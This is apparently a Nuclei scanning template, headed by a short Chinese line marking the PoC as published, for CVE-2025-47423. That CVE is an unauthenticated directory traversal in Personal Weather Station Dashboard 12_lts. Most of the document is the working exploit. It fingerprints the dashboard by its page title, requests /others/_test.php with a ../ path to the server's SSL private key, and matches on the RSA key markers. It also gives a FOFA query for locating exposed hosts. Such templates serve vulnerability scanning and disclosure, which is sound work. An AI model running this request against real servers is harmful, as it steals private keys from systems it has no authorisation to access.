Personal Weather Station Dashboard 12_lts allows unauthenticated remote attackers to read arbitrary files via ../ directory traversal in the test parameter to /others/_test.php, as demonstrated by reading the server's private SSL key in cleartext.
PoC代码[已公开]
id: CVE-2025-47423
info:
name: Personal Weather Station Dashboard 12 - Directory Traversal
author: pussycat0x
severity: high
description: |
Personal Weather Station Dashboard 12_lts allows unauthenticated remote attackers to read arbitrary files via ../ directory traversal in the test parameter to /others/_test.php, as demonstrated by reading the server's private SSL key in cleartext.
reference:
- https://github.com/Haluka92/CVE-2025-47423
- https://pwsdashboard.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2025-47423
cwe-id: CWE-24
epss-score: 0.01569
epss-percentile: 0.80878
metadata:
fofa-query: title="PWS Dashboard"
max-request: 2
tags: cve,cve2025,lfi,pws,traversal
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "PWS Dashboard</title>"
internal: true
- raw:
- |
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "BEGIN RSA PRIVATE KEY"
- "END RSA PRIVATE KEY"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100d839fb3e38296d15a63e2c5804ad98cd5e16026e00f00e2dc0c6ea3bcd4caf84022100a26b83dee68d208da4a0a9c4349f8fe946e80641bc027d343478a197343ed5d2:922c64590222798bb761d5b6d8e72950